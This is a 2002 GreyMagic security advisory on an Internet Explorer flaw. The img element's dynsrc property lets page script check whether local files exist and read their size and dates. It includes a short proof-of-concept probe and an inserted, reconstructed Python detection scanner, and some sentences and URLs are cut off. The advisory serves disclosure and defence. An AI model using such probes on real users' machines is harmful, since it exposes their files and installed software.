Retrieving information on local files in IE (GM#003-IE)

From: GreyMagic Software (security@GREYMAGIC.COM)
Date: 03/27/02

Date:         Wed, 27 Mar 2002 02:21:56 +0200
From: GreyMagic Software <security@GREYMAGIC.COM>

GreyMagic Security Advisory GM#003-IE

By GreyMagic Software, Israel.
27 Mar 2002.

Available in HTML format at

Topic: Retrieving information on local files in IE.

Discovery date: 18 Feb 2002.

Affected applications:

All tested versions of Microsoft Internet Explorer (IE5+); prior versions
may be vulnerable as well.


The <img> element is commonly used to present images in an HTML document.
However, it also contains a feature that allows it to present other types of
media, such as VRML, AVI, MPEG, etc.

This feature was implemented in the form of a property named dynsrc.


The problem lies within the dynsrc property's implementation, which
completely ignores the source validity and gives script access to the
assigned file even if it is not presentable.

Once a file name has been assigned to the dynsrc property, it is possible to
see whether the file exists by checking the fileSize property of the <img>
element. If the return value is -1, it is certain that the file does not
exist; any greater value indicates that the file exists.

Once a file is known to exist, it is possible to extract additional
information from the <img> element, such as:

* The file size in bytes, using the fileSize property.
* The date the file was created, using the fileCreatedDate property.
* The date the file was last modified, using the fileModifiedDate property.
* The date the file was last updated, using the fileUpdatedDate property.

A malicious attacker may use this bug in conjunction with other bugs to
detect files or determine whether the user has specific programs (and even
specific versions, according to size) installed, etc.


This simple example demonstrates how the bug is used to check whether
"c:/test.txt" exists and retrieves its additional properties if it does.

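<img dynsrc="file://c:/test.txt" id="oFile">
<script language="jscript" defer>
// The event hook and the alert() call are missing from this copy of the
// advisory; window.onload and alert() are assumed here.
window.onload = function () {
    alert(
        // fileSize is -1 when the file assigned to dynsrc does not exist.
        oFile.fileSize > -1 ?
            "File exists!\n\n" +
            "Size: " + oFile.fileSize + " bytes.\n" +
            "Created: " + oFile.fileCreatedDate + ".\n" +
            "Modified: " + oFile.fileModifiedDate + ".\n" +
            "Updated: " + oFile.fileUpdatedDate + "."
        :
            "File does not exist."
    );
};
</script>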
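Detection logic for the pattern described above, added here as an example and not part of the GreyMagic advisory: a Python scanner that flags HTML (for instance at a mail or web gateway) in which dynsrc points at a local path and script reads the file* properties. The finding names, the regular expressions and the sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Properties the advisory lists as readable once dynsrc is assigned.
FILE_PROPS = ("fileSize", "fileCreatedDate", "fileModifiedDate", "fileUpdatedDate")
# Local targets: file: URLs, drive-letter paths, UNC paths (assumed heuristic).
LOCAL_RE = re.compile(r"^\s*(file:|[a-z]:[\\/]|\\\\)", re.I)
PROP_RE = re.compile(r"\.\s*(%s)\b" % "|".join(FILE_PROPS))
ASSIGN_RE = re.compile(r"\.\s*dynsrc\s*=", re.I)

# Constructed sample, modelled on the markup pattern the advisory describes.
SAMPLE = '''<img dynsrc="file://c:/test.txt" id="oFile">
<script language="jscript" defer>
var n = oFile.fileSize, d = oFile.fileModifiedDate;
</script>'''

class DynsrcScanner(HTMLParser):
    """Collects local dynsrc attributes and all script text from one document."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings, self.script, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        self.in_script = self.in_script or tag == "script"
        for name, value in attrs:  # names arrive lowercased; value may be None
            if name == "dynsrc" and value and LOCAL_RE.match(value):
                self.findings.append(("local-dynsrc", value.strip()))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.script.append(data)

def scan(html):
    """Return findings; 'file-probe' means a dynsrc signal plus file* property reads."""
    s = DynsrcScanner()
    s.feed(html)
    s.close()
    script = "".join(s.script)
    if ASSIGN_RE.search(script):  # weaker signal: target is only known at run time
        s.findings.append(("script-sets-dynsrc", ""))
    props = sorted(set(PROP_RE.findall(script)))
    if s.findings and props:
        s.findings.append(("file-probe", ",".join(props)))
    return s.findings
```

A page that uses dynsrc for an ordinary media clip and never points it at a local path produces no findings, so the scanner can run over all inbound HTML without flagging legitimate video embeds.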


Microsoft was first informed on 18 Feb 2002 (38 days ago). They have opened
an investigation regarding this issue and will probably release a patch in
the near future.

Until a patch becomes available the only workaround is to disable Active

Tested on:

IE5sp2 NT4 sp6a, all possible patches.
IE5.5sp2 Win98, all patches.
IE5.5sp2 NT4 sp6a, all patches.
IE6sp1 Win2000 sp2, all patches.


A fully dynamic proof-of-concept demonstration of this issue is available at


Please mail any questions or comments to

- Copyright 2002 GreyMagic Software.
